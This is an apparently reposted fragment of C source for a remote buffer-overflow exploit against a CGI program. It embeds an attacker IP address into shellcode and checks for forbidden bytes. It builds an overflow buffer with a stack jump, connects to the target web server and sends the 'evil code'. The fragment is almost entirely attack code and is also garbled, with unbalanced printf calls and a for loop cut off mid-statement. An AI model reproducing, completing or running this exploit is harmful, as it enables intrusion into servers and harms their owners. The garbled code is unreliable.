|
CGI漏洞(26) /* Think of this as a strange value? Think of the shellcode alignment */
sip ^= 0x1192011e; /* Check if the given RETADDY won‘t ruin our payload */
if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) {
printf("Error: Found illegal character in return address\n";
exit(0);
}
/* Check if the given IP won‘t ruin our shellcode */
if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) {
printf("Error: Found illegal character in IP address\n";
exit(0);
} /* Locate the IP position in the shellcode */
iploc=(char *)strchr(hellcode, 0xAA);
memcpy((void *) iploc, (void *) &sip, 4); evilcode = buildOverflow(retaddy, align); sd = wwwconnect(dip);
printf("Connected to %s\n", argv[1]);
printf("Proceeding to send evil code...\n";
send(sd, evilcode, strlen(evilcode), 0);
printf("Sent!\n"; return(0);
} char *buildOverflow(unsigned long retaddy, unsigned int align)
{
char source[SZ_SOURCEBUF];
char *smash, *output;
int c; smash = (char *)xmalloc(SZ_FILEBUF+align+1);
output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1); for(c=0;c source[253] = 0xeb; /* Jump over few bytes between arrays on stack */
source[254] = 0x08;
source[255] = 0x00; /*
Directory and Sourcename follow each other on stack closely
| 
